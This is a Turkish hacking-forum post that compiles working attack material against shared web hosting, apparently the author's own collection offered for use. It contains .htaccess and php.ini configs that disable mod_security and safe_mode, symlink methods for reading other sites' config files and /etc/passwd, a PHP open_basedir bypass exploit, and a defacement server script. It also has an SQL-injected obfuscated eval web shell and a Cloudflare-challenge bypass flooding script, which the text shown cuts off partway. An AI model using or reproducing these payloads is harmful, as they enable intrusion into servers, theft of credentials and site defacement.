Htaccess Arşiv -




Y4K4L4
Mesaj tarihi: 03.03.2018 22:55:41
Arkadaşlar Tamamen Benim Düzenlediğim Toparladığım Arşivdir, Alıntı Değildir. Elimde Olanları Sizlerle Paylaşmak İstedim. http://pasted.co/af6fbf9f [highlight=php] Forbidden   403   .htaccess   Options   all   DirectoryIndex   Sux.html   AddType   text/plain   .php   AddHandler   server-parsed   .php   AddType   text/plain   .html   AddHandler   txt   .html   Require   None   Satisfy   Any   ====================================================================   Forbidden   403      Options   Indexes   FollowSymLinks   DirectoryIndex   ssssss.htm   AddType   txt   .php   AddHandler   txt   .php   ====================================================================   Forbidden   404   HeaderName   config.txt   ReadmeName   config.txt   footerName   config.txt   ====================================================================   /ln   -s/home/örnek/public_html/config.txt/   ====================================================================        .htaccess   1   LiteSpeed   Hack   Method   Options   all   DirectoryIndex   Sux.html   AddType   text/plain   .php   AddHandler   server-parsed   .php   AddType   text/plain   .html   AddHandler   txt   .html   Require   None   Satisfy   Any   ====================================================================   .htacces   2   LiteSpeed   Hack   Method   <?php   //(c)   $filename   =   dirname(__FILE__).-/.htaccess";        $fp   =   fopen($filename,   "w");   (fwrite($fp));   (fwrite($fp,      "Options   all   DirectoryIndex   Sux.html   AddType   text/plain   .php   AddHandler   server-parsed   .php   AddType   text/plain   .html   AddHandler   txt   .html   Require   None   Satisfy   Any"));   fclose($fp);      ====================================================================   .htacces   3   LiteSpeed   Hack   Method   [/code]Options   +FollowSymLinks   DirectoryIndex   seees.html   RemoveHandler   .php   AddType   application/octet-stream   .php   ====================================================================   .htacces   4   LiteSpeed   Hack   Method   <Files   *.php>   ForceType   application/x-httpd-php4   </Files>   ====================================================================   safe   mode   .htaccess   #   BEGIN   safe   mode   <IfModule   mod_security.c>   SecFilterEngine   Off                  SecFilterScanPOST   Off      </IfModule>   #   END   safe   mode        ini.php   <?   echo   ini_get("safe_mode");   echo   ini_get("open_basedir");   include($_GETsansursansursansur91;"file"sansursansursansur93;);   ini_restore("safe_mode");   ini_restore("open_basedir");   echo   ini_get("safe_mode");   echo   ini_get("open_basedir");   include($_GETsansursansursansur91;"ss"sansursansursansur93;);   ?>   //   php.ini   safe_mode   =   off   exec   =   On   shell_exec   =   On   ====================================================================             htaccess   Pl   Çalıştır   Options   FollowSymLinks   MultiViews   Indexes   ExecCGI   AddType   applicationx-httpd-cgi   .net   AddHandler   cgi-script   .net   AddHandler   cgi-script   .net   ====================================================================   htaccess.Pl2   Options   FollowSymLinks   MultiViews   Indexes   ExecCGI   AddType   application/x-httpd-cgi   .net   AddHandler   cgi-script   .net   AddHandler   cgi-script   .net   ====================================================================   htaccess   pl   gif   çalıştırma   addhandler   cgi-script   .gif   ====================================================================   Htaccess   .shtml   Parsed   Options   +Includes   AddType   text/html   .shtml   AddHandler   server-parsed   .shtml   ====================================================================   htaccess   dizin   #deny   all   access   deny   from   all   ====================================================================   htaccess   dizin2   Options   +Indexes   +MultiViews   +FollowSymlinks   IndexOptions   FancyIndexing   ====================================================================   htaccess   follow   Options   +FollowSymlinks   ====================================================================   htaccess   follow   2   Options   +FollowSymLinks   DirectoryIndex   seees.html   Options   +Indexes   ====================================================================   htaccess   follow   3   Options   +Indexes   +MultiViews   +FollowSymlinks   IndexOptions   FancyIndexing   DirectoryIndex   blabla.htm   ====================================================================   htaccess   follow   4   Options   +FollowSymLinks   DirectoryIndex   sas   ====================================================================   htaccess   php   parsed   Options   +FollowSymLinks   DirectoryIndex   seees.html   RemoveHandler   .php   AddType   application/octet-stream   .php   ====================================================================   htaccess   php   parsed   2   AddType   application/octet-stream   .php   ====================================================================   php   versiyon   AddType   application/x-httpd-php5   .php   ====================================================================   htaccess   filtrele   <IfModule   mod_security.c>   SecFilterScanPOST   Off   </IfModule>   ====================================================================   htaccess   filtrele   2   <IfModule   mod_security.c>   SecFilterEngine   Off   SecFilterScanPOST   Off   </IfModule>      ====================================================================   suPhp   php.ini   Çalıştır   suPHP_ConfigPath   /home/ogi/public_html/cra/php.ini   ====================================================================   XSS   Filtreleme   RewriteEngine   On   RewriteCond   %{QUERY_STRING}   base64_encode.*\\(.*\\)   [OR]   RewriteCond   %{QUERY_STRING}   (\\<|<).*script.*(\\>|>)   [NC,OR]   RewriteCond   %{QUERY_STRING}   GLOBALS(=|\\[|\\%[0-9A-Z]{0,2})   [OR]   RewriteCond   %{QUERY_STRING}   _REQUEST(=|\\[|\\%[0-9A-Z]{0,2})   RewriteRule   ^(.*)$   index.php   [F,L]   ====================================================================   htaccess   Site   Yönlendirme   AuthName   "Dr.Art'st   Co"   ErrorDocument   403   <a href="http://imhatimi.org/" target="_blank">http://imhatimi.org/</a>   Order   deny,allow   Deny   from   all   Allow   from   192.168.3.5   ====================================================================   CXS   Bypass   ve   Forbidden   Not   Found   Options   all   ForceType   text/plain   AddType   text/plain   .php   AddType   text/plain   .html   AddHandler   server-parsed   .php   AddHandler   txt   .php   ====================================================================   Geliştirilmiş   Forbidden   .htaccess   OPTIONS   Indexes   FollowSymLinks   SymLinksIfOwnerMatch   Includes   IncludesNOEXEC   ExecCGI   Options   Indexes   FollowSymLinks   ForceType   text/plain   AddType   text/plain   .php      AddType   text/plain   .html   AddType   text/html   .shtml   AddType   txt   .php   AddHandler   server-parsed   .php   AddHandler   txt   .php   AddHandler   txt   .html   AddHandler   txt   .shtml   Options   All   Options   All   ReadmeName   deneme.txt   ====================================================================   /Not/   aynı   mantık   ile   ln   -s   /home/user/public_html/config.php   deneme.txt      ekrana   yansıtıyoruz.   not   :   her   serverde   işe   yaramaz      her   swnin   kendi   mantıka   göre   gecilme   yöntemleri   var.      ====================================================================   CXS   Server   Cgi   Yememe   Sorunu   .htaccess   htaccess   :      Options   +FollowSymLinks   +Indexes   DirectoryIndex   default.html      ##   START   ##   Options   +ExecCGI   AddHandler   cgi-script   log   cgi   pl   tg   love   h4   tgb   x-zone      AddType   application/x-httpd-php   .jpg   RewriteEngine   on   RewriteRule   (.*)\war$   .log   ##   END   ##   ====================================================================   Symlink   Perl        #!/usr/bin/perl   #   TG//   symlink   ("/home/kroist/public_html/","/home/banyansp/public_html/cra/2");   print   "Content-type:   text/html\\n\\n";   open   (THISFILE,"aria.txt");   foreach   $line()   {   print   "$line<br>\\n";   }   close   (THISFILE);   ====================================================================   etc   passwd   çekme   methodu   etc.php   diye   dosya   oluşturun   içine   bu   komutları   yapıştırın.        <?php      for($uid=0;$uid<2000;$uid++){   //cat   /etc/passwd      $nothing   =   posix_getpwuid($uid);      if   (!empty($nothing))   {      while   (list   ($key,   $val)   =   each($nothing)){      print   "$val:";      }      print   "<br   />";      }      }   ?>   ====================================================================   Safe   Mod   Off   Disabled   Fonk,   Mod   Security   <body   text="#FFFFFF"   bgcolor="#000000">   <?php   echo   "<html>   <center>   <img   border=2   src=http://img237.imageshack.us/img237/2972/bannerwa8.jpg   width=429   height=97><br>   <head>   <title>Safe   Mode   -   Security_Mod   -   For   Disable   Functions   Fucked   lol   xD   </title>   <meta   http-equiv='pragma'   content='no-cache'>   </head><body>";   $fp   =   fopen("php.ini","w+");   fwrite($fp,"safe_mode   =   Off            disable_functions   =   safe_mode_gid   =   OFF   open_basedir   =   OFF   ");   echo   "<b><font   color=darkred><BR>[*]   Safe   Mode   OFF   yap�l�yor   ...   <BR>[*]   islem   Tamamlandi      oK   !<br><br><br><br>";   $fp2   =   fopen(".htaccess","w+");   fwrite($fp2,"<IfModule   mod_security.c>      SecFilterEngine   Off      SecFilterScanPOST   Off      SecFilterCheckURLEncoding   Off      SecFilterCheckUnicodeEncoding   Off   </IfModule>   ");   echo   "<BR>[*]   Security_Mod   aktif   ediliyor   ...   <BR>[*]   islem   Tamamlandi      oK   !   ";   ?>   <BR><BR><BR><BR>   </center>   ====================================================================   -   [   Bypass   Directory   ]-   <Directory   "/home/user/public_html">   Options   -ExecCGI   AllowOverride   AuthConfig   Indexes   Limit   FileInfo   options=IncludesNOEXEC,Indexes,Includes,MultiViews   ,SymLinksIfOwnerMatch,FollowSymLinks      </Directory>             Options   all   DirectoryIndex   Sux.html   AddType   text/plain   .php   AddHandler   server-parsed   .php   AddType   text/plain   .html   ====================================================================   htaccess   bypass   LiteSpeed   [   Bypass   Litespeed   ]   wew.shtml   do   ==>   ln   -ls   /home/user/public_html/configuration.php   wew.shtml           .htaccess   Options   +FollowSymLinks   DirectoryIndex   chesss.html   RemoveHandler   .php      AddType   application/octet-stream   .php   ====================================================================   -   [   Bypass   OVH   ]-   .htaccess      Olarak   Kaydedin   Server'a   Atın        Options   +FollowSymLinks   DirectoryIndex   Index.html   Options   +Indexes   AddType   text/plain   .php   AddHandler   server-parsed   .php   AddType   root   .root   AddHandler   cgi-script   .root   AddHandler   cgi-script   .root        php.ini   Olarak   Kaydedin   Server'a   Atın        safe_mode   =   Off   disable_functions   =   safe_mode_gid   =   Off   open_basedir   =   Off   register_globals   =   on   exec   =   On   shell_exec   =   On   ln   -s   /   Y4K4L4   ====================================================================   c1   bypass   kodları   tar   -xvf   c1.tar.gz   tar   zxvf   c1.tar.gz   C1/1/var/named   Yada   ;   C1/var/www/vhosts   Bu   Swden   Swye   Değişiyor        Config   Çekmek   İçin   /home/deneme/public_html/site1/   ====================================================================   etc   passwd   çekme   Methodu   etc.php   diye   dosya   oluşturun   ve   içine   bu   komutları   yapıştırın.        <?php      for($uid=0;$uid<2000;$uid++){   //cat   /etc/passwd      $nothing   =   posix_getpwuid($uid);      if   (!empty($nothing))   {      while   (list   ($key,   $val)   =   each($nothing)){      print   "$val:";      }      print   "<br   />";      }      }   ?>   ====================================================================   port   mass   tool   =>   perl   mass.pl        #!/usr/bin/perl   -w   use   strict;   use   IO::Socket;        sub   Wait   {   wait;   }        $SIG{CHLD}   =   \&Wait;        my   $server   =   IO::Socket::INET->new(   LocalPort   =>   1148,   Type   =>   SOCK_STREAM,   Reuse   =>   1,   Listen   =>   10)   or   die   "$@\n";   my   $client   ;        while($client   =   $server->accept())   {   select   $client;   print   $client   "HTTP/1.0   200   OK\r\n";   print   $client   "Content-type:   text/p\r\n\r\n";   print   $client   '<html>   <center>   <h1>Hacked   By   Y4K4L4</h1>   </center>   </html>';   }   continue   {   close($client);   kill   CHLD   ->   -$$;   }   ====================================================================   a.sql   normal   txt   aç   kodları   yapıstır   a.sql   diye   kaydet        system/logs/isim.php   system/storage/logs             SELECT   '<?php   eval   (gzinflate(base64_decode(str_rot13("ML/EF8ZjRZnsUrk/hVMOJaQZS19pZ3kkVNtX06qEFgnxAct0bH2RGin/zljgT/c2q9   /iih+BI40TaSguWq98TXxc4k0pOiufqT+K7WvibboK8kxCfTyZ6IddrWcAV5mKhyANXlg0FkNPkJ2wTHUTrlQtoJHUjjyFGycunTqKtI8lnvzPLRJ   DT6ZEPUoIKJWkYyewYRFaJxt+epn6S0qs39+umDuTfsEJnSmd3HRWTkCv/WgX54K4g98833KBSUHXv/Ygqsr+k4USOENPRjxM/ZkaAk56eYDM0xJ5   sK552h1khNHKr2lIXpZOhYvSs2VHZh8O8oKbPibYUutxFLYKpCY2KCo8Y7ByDy6D0l8="))));   ?>'   FROM   `mouwaffek_table`   ====================================================================   Shell   Upload   txt   bypass        AddType   application/x-httpd-php   .txt   yazın   icine   ve   shellinize   site.com/img/shell.txt   ====================================================================   ====================================================================   ====================================================================   ====================================================================   ====================================================================   PHP   Symnlik   Open   Basedir   Restriction   vulnerability   php   5.2.12-5.3.1   Symlink   Bypass        Options   Indexes   FollowSymLinks   DirectoryIndex   linuxsec.htm   AddType   txt   .php   AddHandler   txt   .php   ====================================================================   ====================================================================   ====================================================================   ====================================================================   ====================================================================   LiteSpeed   Symnlink   403   Forbidden   Bypass        python   shell   ,   CGI   PERL   Shell   and   .htaccess      the   htaccess   code   is      Options   Indexes   FollowSymLinks   DirectoryIndex   ssssss.htm   AddType   txt   .php   AddHandler   txt   .php   <IfModule   mod_autoindex.c>      IndexOptions   FancyIndexing   IconsAreLinks   SuppressHTMLPreamble      </ifModule>   <IfModule   mod_security.c>      SecFilterEngine   Off      SecFilterScanPOST   Off      </IfModule>   Options   +FollowSymLinks   DirectoryIndex   Sux.html   Options   +Indexes   AddType   text/plain   .php   AddHandler   server-parsed   .php   AddType   text/plain   .html   ===============   what   we   should   do   ?      just   open   the   cgi   bypass   shell   and   do   sym   ln   -s   /home/user/public_html/wp-config.php   1.txt   then      cat   1.txt   ====================================================================   ====================================================================   ====================================================================   ====================================================================   ====================================================================   LiteSpeed   Bypass   Symlink        OPTIONS      Indexes   Includes   ExecCGI   FollowSymLinks   AddHandler   txt   .php   AddHandler   cgi-script   .pl   AddHandler   cgi-script   .pl   OPTIONS   Indexes   Includes   ExecCGI   FollowSymLinks   Options   Indexes   FollowSymLinks   AddType   txt   .php   AddType   text/html   .shtml   Options   All   Options   All   ====================================================================   ====================================================================   ====================================================================   ====================================================================   Server   Error   Bypass   Hatası   Çözümü        .htaccess        #Bypass   By   Y4K4L4   <DIRECTORY   /..../user/..../>      OPTIONS   Indexes   ExecCGI   FollowSymLinks      AllowOverride   All      </DIRECTORY>      AddType   txt   .php      AddHandler   txt   .php                php.ini        #Bypass   By   YAKALA   safe_mode   =   OFF      disable_functions   =   NONE      safe_mode_gid   =   OFF      open_basedir   =   OFF      register_globals   =   ON      exec   =   ON      shell_exec   =   ON   ====================================================================   ====================================================================   ====================================================================   ====================================================================   ====================================================================   İnclude   Symlink   Options   all      DirectoryIndex   Sux.html      AddType   text/plain   .php      AddHandler   server-parsed   .php      AddType   text/plain   .html      AddHandler   txt   .html      Require   None      Satisfy   Any   DirectoryIndex   new   DirectoryIndex   config.ini   ====================================================================   ====================================================================   ====================================================================   ====================================================================   ====================================================================   .htaccess   Destroyer   Kodu        Addhandler   written   by   Y4K4L4   DirectoryIndex   index.html   <Directory   />   Options   FollowSymLinks   Options   All   +Indexes   +FollowSymLinks   Options   All   +ExecCGI   Options   All   +Indexes   Options   All   +FollowSymLinks   Options   All   +SymLinksIfOwnerMatch   Options   All   +MultiViews   Options   All   +Includes   Options   All   +IncludesNOEXEC   Options   All   +IndexOptions   +FancyIndexing   AllowOverride   None   AllowOverride   All   order   allow,deny   allow   from   all   </Directory>   AddType   text/plain   .php   AddType   text/plain   .htaccess   AddHandler   server-parsed   .php   Addhandler   cgi-script   .asp   ForceType   application/x-httpd-php4   HeaderName   1.txt   ReadmeName   1.txt   AddDefaultCharset   utf-8   RewriteEngine   On   RewriteRule   ^sitemap.xml/?$   md_sitemap.php   [QSA,NC,L]   RewriteRule   ^src/(.*)/page/([0-9]+)/?$   index.php?src=$1&page=$2   [QSA,NC,L]   RewriteRule   ^src/(.*)/?$   index.php?src=$1   [QSA,NC,L]   RewriteRule   ^web/(.*)   web.php?url=$1   [QSA,NC,L]   RewriteRule   (.*)\.was$   $1.was   RewriteRule   .*   –   [E=HTTP_AUTHORIZATION:%{HTTP:Authorization},L]   <IfModule   mod_rewrite.c>   RewriteEngine   On   RewriteCond   %{REQUEST_FILENAME}   -f   [OR]   RewriteCond   %{REQUEST_FILENAME}   -d   RewriteRule   ^(.+)   –   [PT,L]   RewriteRule   ^(.*)   index.php   </IfModule>   <IfModule   Mod_security.c>   SecFilterEngine   OFF   SecFilterEngine   OFF   SecFilterScanPort   OFF   SecFilterScanPort   OFF   SecFilterCheckURLEncoding   OFF   SecFilterCheckURLEncoding   OFF   SecFilterCheckUnicodeEncoding   OFF   SecFilterCheckUnicodeEncoding   OFF   RewriteRule   (.*)\.was$   $1.was   </IfModule>   </   IfModule>   ====================================================================   ====================================================================   ====================================================================   ====================================================================   ====================================================================   Bypass   Symlink   With   .htaccess   <Directory   "/home/user/public_html">   Options   -ExecCGI   AllowOverride   AuthConfig   Indexes   Limit   FileInfo   options=IncludesNOEXEC,Indexes,Includes,MultiViews   ,SymLinksIfOwnerMatch,FollowSymLinks   </Directory>   ====================================================================   ====================================================================   ====================================================================   ====================================================================   ====================================================================   Bypass   Symlink   via   .htaccess   2016   .htaccess   Options   all   DirectoryIndex   Sux.html   AddType   text/plain   .php   AddHandler   server-parsed   .php   AddType   text/plain   .html   AddHandler   txt   .html   Require   None   Satisfy   Any   ====================================================================   ====================================================================   ====================================================================   ====================================================================   ====================================================================   Bypass   Passwd   LiteSpeed        OPTIONS   Indexes   Includes   ExecCGI   FollowSymLinks   AddHandler   txt   .php   AddHandler   cgi-script   .cgi   AddHandler   cgi-script   .pl   OPTIONS   Indexes   Includes   ExecCGI   FollowSymLinks   Options   Indexes   FollowSymLinks   AddType   txt   .php   AddType   text/html   .shtml   Options   All   Options   All   ====================================================================   ====================================================================   ====================================================================   ====================================================================   ====================================================================   Bypass   OVH   wew.shtml   do   ==>   ln   -ls   /home/user/public_html/configuration.php   wew.shtml   .htaccess   Options   +FollowSymLinks   DirectoryIndex   chesss.html   RemoveHandler   .php   AddType   application/octet-stream   .php   ====================================================================   ====================================================================   ====================================================================   Bypass   LiteSpeed        Options   Indexes   FollowSymLinks   DirectoryIndex   ssssss.htm   AddType   txt   .php   AddHandler   txt   .php   ====================================================================   ====================================================================   ====================================================================   ====================================================================   Symlink   Bypass   404        <?php   /*   PHP   5.2.11/5.3.0   symlink()   open_basedir   bypass   by   Y4K4L4        CHUJWAMWMUZG   */        $fakedir="cx";   $fakedep=16;        $num=0;   //   offset   of   symlink.$num        if(!empty($_GET['file']))   $file=$_GET['file'];   else   if(!empty($_POST['file']))   $file=$_POST['file'];   else   $file="";        echo   '<PRE><img   src="http://www.imhatimi.org/"><P>This   is   exploit   from   <a   href="http://securityreason.com/"   title="Yakala   PHP">Yakala   Lab   -   SecurityReason</a>   labs.   Author   :   Y4K4L4   <p>Script   for   legal   use   only.   <p>PHP   5.2.11   5.3.0   symlink   open_basedir   bypass   <p>More:   <a   href="http://imhatimi.org/">Yakala</a>   <p><form   name="form"   action="http://'.$_SERVER["HTTP_HOST"].htmlspecialchars($_SERVER["PHP_SELF   "]).'"   method="post"><input   type="text"   name="file"   size="50"   value="'.htmlspecialchars($file).'"><input   type="submit"   name="hym"   value="Create   Symlink"></form>';        if(empty($file))   exit;        if(!is_writable("."))   die("not   writable   directory");        $level=0;        for($as=0;$as<$fakedep;$as++){   if(!file_exists($fakedir))   mkdir($fakedir);   chdir($fakedir);   }        while(1<$as--)   chdir("..");        $hardstyle   =   explode("/",   $file);        for($a=0;$a<count($hardstyle);$a++){   if(!empty($hardstyle[$a])){   if(!file_exists($hardstyle[$a]))   mkdir($hardstyle[$a]);   chdir($hardstyle[$a]);   $as++;   }   }   $as++;   while($as--)   chdir("..");        @rmdir("fakesymlink");   @unlink("fakesymlink");        @symlink(str_repeat($fakedir."/",$fakedep),"fakesymlink");        //   this   loop   will   skip   allready   created   symlinks.   while(1)   if(true==(@symlink("fakesymlink/".str_repeat("../",$fakedep-1).$file,   "symlink".$num)))   break;   else   $num++;        @unlink("fakesymlink");   mkdir("fakesymlink");        die('<FONT   COLOR="RED">check   symlink   <a   href="./symlink'.$num.'">symlink'.$num.'</a>   file</FONT>');        ?>        PHP   Symbolic   Link   Open_Basedir   Bypass   Vulnerability        script1.php   <?            symlink("a/a/a/a/a/a/",   "dummy");            symlink("dummy/../../../../../../etc/passwd",   "xxx");            unlink("dummy");            while   (1)   {                           symlink(".",   "dummy");                           unlink("dummy");            }   ?>        script2.php   <?   while   (1)   {                           print   @file_get_contents("xxx");   }   ?>   ====================================================================   ====================================================================   ====================================================================   ====================================================================   ====================================================================   Simple   Bypass   İnternal   Server   Error   Symlink   2016   A   good   way   to   bypass   forbidden   error   when   reading   passwd   file   The   general   approach:        ln   -s   /   etc   /   passwd   passwd.txt        Well,   open   the   passwd   file   The   forbidden   error   encountered   for   bypass=>        To   bypass   coming   from   one   of   the   following   two   commands   are   used:   Code:   (Select   All)   ln   -s   /etc/passwd   README   ln   -s   /etc/passwd   HEADER   The   second   command   will   run   in   a   directory   And   when   we   go   back   to   the   directory   where   the   file   will   be   shown   passwd   us.   SPT   to   b0x           Bypass   Symlink   (Priv8)   How   you   can   bypass   Symlink   in   linux   webserver   ?        1/   Create   a   folder        2/   Upload   inside        ".htaccess"              CODE:        Options   all   DirectoryIndex   Sux.html   AddType   text/plain   .php   AddHandler   server-parsed   .php   AddType   text/plain   .html   AddHandler   txt   .html   Require   None   Satisfy   Any        3/   Bypass   manually        ln   -s   /home/user/public_html/t0ph4cking.txt           Bypass   Symlink   403   Forbidden   with   .htaccess        Options   all   DirectoryIndex   Sux.html   AddType   text/plain   .php   AddHandler   server-parsed   .php   AddType   text/plain   .html   AddHandler   txt   .html   Require   None   Satisfy   Any   ====================================================================   ====================================================================   ====================================================================   ====================================================================   ==================================================================== ======================================================================= ClodFlare Bypass <?php if($argc != 5) { echo "Usage: php $argv[0] http://site.com/ (proxy list set to none if none)(threads)(time)\n"; die(); } function get_between($string,$start,$end) { $string = " ".$string; $ini = strpos($string, $start); if($ini==0) return ""; $ini += strlen($start); $len = strpos($string, $end, $ini) - $ini; return substr($string, $ini, $len); } function rand_line($fileName, $maxLineLength = 7096) { $handle = @fopen($fileName, "r"); if ($handle) { $random_line = null; $line = null; $count = 0; while (($line = fgets($handle, $maxLineLength)) !== false) { $count++; if(rand() % $count == 0) { $random_line = $line; } } if (!feof($handle)) { echo "Error: unexpected fgets() fail\n"; fclose($handle); return null; } else { fclose($handle); } return $random_line; } } function bypassyourdog($domain, $useragent, $proxy) { $cURL = curl_init(); curl_setopt($cURL, CURLOPT_URL, $domain); curl_setopt($cURL, CURLOPT_RETURNTRANSFER, 1); curl_setopt($cURL, CURLOPT_HEADER, 1); curl_setopt($cURL, CURLOPT_USERAGENT, $useragent); curl_setopt($cURL, CURLOPT_FOLLOWLOCATION, true); curl_setopt($cURL, CURLOPT_PROXY, $proxy); curl_setopt($cURL, CURLOPT_COOKIEFILE, "cookie.txt"); $string = curl_exec($cURL); curl_close($cURL); $domain = get_between($string, '</span> ', '.</h1>'); $jschl_vc = get_between($string, '"jschl_vc" value="', '"/>'); $pass = get_between($string, '"pass" value="', '"/>'); $settimeout = get_between($string, 'setTimeout(function(){', 'f.submit()'); $mathvariables = get_between($settimeout, 'var t,r,a,f, ', ';'); $mathvariable = explode('=', $mathvariables); $mathvariable1 = get_between($mathvariables, '{"', '":'); $mathvariable2 = $mathvariable[0].".".$mathvariable1; $math1 = get_between($mathvariables, '":', '}'); $math2 = $mathvariable[0].get_between($settimeout, ";".$mathvariable[0], ';a.value'); $fuck = 0; $math2s = explode(';', $math2); $mathtotal = 0; $answers = array(); $totalformath1 = 0; //echo "Domain: $domain\nJSCHL_VC: $jschl_vc\nPASS: $pass\nSet Timeout: $settimeout\n"; if($pass == NULL) { file_put_contents('log.txt', $string, FILE_APPEND); } if(get_between($math1, '((', '))') != NULL) { $dog311 = get_between($math1, '((', '))'); $math1ss = explode(')', $dog311); $math1sss = explode('+', $math1ss[0]); $math1ssss = explode('(', $dog311); $math1sssss = explode('+', $math1ssss[1]); $ifuckdog = 0; $ufuckdog = 0; foreach($math1sss as $imoutofvars2) { if ($imoutofvars2 == "!" || $imoutofvars2 == "!![]" || $imoutofvars2 == "![]") { $ifuckdog++; } } foreach($math1sssss as $imoutofvars3) { if ($imoutofvars3 == "!" || $imoutofvars3 == "!![]" || $imoutofvars3 == "![]") { $ufuckdog++; } } $totalformath1 = $ifuckdog.$ufuckdog; array_push($answers, $totalformath1." +"); } else { $math1ss = explode('+', $math1); foreach($math1ss as $fuckmydog){ if ($fuckmydog == "!" || $fuckmydog == "!![]" || $fuckmydog == "![]") { $totalformath1++; } } array_push($answers, $totalformath1." +"); } foreach($math2s as $dog123){ $typeofmath = substr($dog123, strlen($mathvariable2), 1); if(get_between($dog123, '((', '))') != NULL) { $dog321 = get_between($dog123, '((', '))'); $poop = 0; $shit = 0; $mathss = explode(')', $dog321); $mathsss = explode('+', $mathss[0]); $mathssss = explode('(', $dog321); $mathsssss = explode('+', $mathssss[1]); foreach($mathsss as $imoutofvars) { if ($imoutofvars == "!" || $imoutofvars == "!![]" || $imoutofvars == "![]") { $poop++; } } foreach($mathsssss as $imoutofvars1) { if ($imoutofvars1 == "!" || $imoutofvars1 == "!![]" || $imoutofvars1 == "![]") { $shit++; } } $fuck = $poop.$shit; array_push($answers, $fuck." ".$typeofmath); $fuck = 0; } else { $fuckingdogs = explode('=', $dog123); $fuckingcats = explode('+', $fuckingdogs[1]); foreach($fuckingcats as $idinglecats) { if ($idinglecats == "!" || $idinglecats == "!![]" || $idinglecats == "![]") { $fuck++; } } array_push($answers, $fuck." ".$typeofmath); $fuck = 0; } } foreach($answers as $answer) { $ilikedogs = explode(' ', $answer); switch($ilikedogs[1]) { case "+": $mathtotal = $mathtotal + $ilikedogs[0]; break; case "-": $mathtotal = $mathtotal - $ilikedogs[0]; break; case "*": $mathtotal = $mathtotal * $ilikedogs[0]; break; } } $jschl_answer = strlen($domain) + $mathtotal; $domain1 = $domain."/cdn-cgi/l/chk_jschl?jschl_vc=$jschl_vc&pass=$pass&jschl_answer=$jschl_answer"; usleep(3000000); $cURL1 = curl_init(); curl_setopt($cURL1, CURLOPT_URL, $domain1); curl_setopt($cURL1, CURLOPT_RETURNTRANSFER, 1); curl_setopt($cURL1, CURLOPT_HEADER, 1); curl_setopt($cURL1, CURLOPT_USERAGENT, $useragent); curl_setopt($cURL1, CURLOPT_FOLLOWLOCATION, true); curl_setopt($cURL1, CURLOPT_PROXY, $proxy); curl_setopt($cURL1, CURLOPT_COOKIEFILE, "cookie.txt"); $test = curl_exec($cURL1); $cfuid = get_between($test, '__cfduid=', '; expires'); $cf_clearance = get_between($test, 'cf_clearance=', '; expires'); echo '__cfduid='.$cfuid.'; cf_clearance='.$cf_clearance."\n"; return '__cfduid='.$cfuid.'; cf_clearance='.$cf_clearance; } $useragents = array( "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:13.0) Gecko/20100101 Firefox/13.0.1", "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:25.0) Gecko/20100101 Firefox/25.0 RestSharp 102.0.0.0", "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/534.57.2 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2", "Mozilla/5.0 (Windows NT 5.1; rv:13.0) Gecko/20100101 Firefox/13.0.1", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11", "Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101 Firefox/13.0.1", "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5", "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:13.0) Gecko/20100101 Firefox/13.0.1", "Opera/9.80 (Windows NT 5.1; U; cs) Presto/2.2.15 Version/10.00", "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; )", "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_5; en-us) AppleWebKit/525.26.2 (KHTML, like Gecko) Version/3.2 Safari/525.26.12", "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11", "Mozilla/5.0 (Linux; U; Android 2.2; fr-fr; Desire_A8181 Build/FRF91) App3leWebKit/53.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1", "Mozilla/5.0 (Windows; U; Windows NT 5.1; cs; rv:1.9.0.5) Gecko/2009021916 Songbird/1.1.2 (20090331142126)", "Mozilla/5.0 (iPhone; CPU iPhone OS 6_1_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B206 Safari/7534.48.3", "Mozilla/5.0 (X11; U; Linux; cs-CZ) AppleWebKit/527+ (KHTML, like Gecko, Safari/419.3) rekonq", "Mozilla/4.0 (compatible; MSIE 6.0; Windows XP 5.1) Lobo/0.98.4", "X-Smiles/1.2-20081113", "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008120120 Blackbird/0.9991", "Mozilla/5.0 (SCH-F859/F859DG12;U;NUCLEUS/2.1;Profile/MIDP-2.1 Configuration/CLDC-1.1;480*800;CTC/2.0) Dolfin/2.0", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; PeoplePal 6.2)", "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.10) Gecko/20100914 Conkeror/0.9.3", "LeechCraft (X11; U; Linux; ru_RU) (LeechCraft/Poshuku 0.3.55-324-g9365f23; WebKit 4.5.2/4.5.2)", "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.8) Gecko/20100317 Postbox/1.1.3", "xine/1.1.16.3", "Bunjalloo/0.7.6(Nintendo DS;U;en)", "Mozilla/5.0 (X11; U; Linux i686; en-US; SkipStone 0.8.3) Gecko/20020615 Debian/1.0.0-3 ", "Opera/9.80 (Windows NT 5.1; U; en) Presto/2.10.229 Version/11.60", "MMozilla/5.0 (Windows; U; Windows NT 6.1; cs-CZ) AppleWebKit/533.3 (KHTML, like Gecko) QupZilla/1.1.5 Safari/533.3", "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)", "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; 